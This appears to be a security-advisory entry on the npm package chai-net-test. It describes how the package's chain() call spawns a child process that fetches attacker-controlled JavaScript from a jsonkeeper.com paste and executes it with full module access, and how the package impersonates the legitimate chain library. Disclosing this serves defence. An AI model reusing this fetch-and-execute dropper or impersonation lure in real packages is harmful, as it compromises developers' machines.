Vulnerability
Malicious code in chai-net-test (npm)
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (cd5f4bb3d7abae3be57c7521b84016b6484d4c21bd2898fcde043d376513cf1e) chai-net-test ships a remote-code-execution dropper behind its public `chain()` API. When a consumer calls `chain([...])` (the documented entry point), src/index.js spawns src/utils/swap.js as a detached child Node process. swap.js performs `axios.get('https://www.jsonkeeper.com/b/5IZTJ')`, takes the response's `.Cookie` string, builds a function via `new Function.constructor('require', s)`, and invokes it with the package's `require` — granting the attacker-supplied JavaScript full Node module access on the consumer's machine. The destination is jsonkeeper.com, a public anonymous JSON paste host whose contents are fully mutable by whoever holds the paste id, so the executed bytes can change at any moment without any package republish. The package additionally impersonates the legitimate stream-chaining library `chain` by uhop: the README claims to be a 'lightweight, no-dependencies micro-package' and links to uhop's wiki, while package.json declares runtime dependencies on axios and sqlite3 — a cover-story to lure consumers of the real library into invoking the trojaned API.
No CVSS base score from NVD or GHSA yet. NVD typically scores within 24–72 hours of publication; GHSA usually within a day for OSS-flagged CVEs. Last record update .
For interim severity, fall back on KEV / EXPLOIT signals and the EPSS percentile (lower panel). Re-check this CVE after one cron tick — the score lands automatically when the source publishes.
FIRST.org publishes EPSS daily. Coverage isn't universal — pre-disclosure CVEs and reserved IDs don't carry an EPSS score until at least one exploitation signal lands. Score will appear within 24 hours of the next EPSS pull.
No exploitation, limited impact or prevalence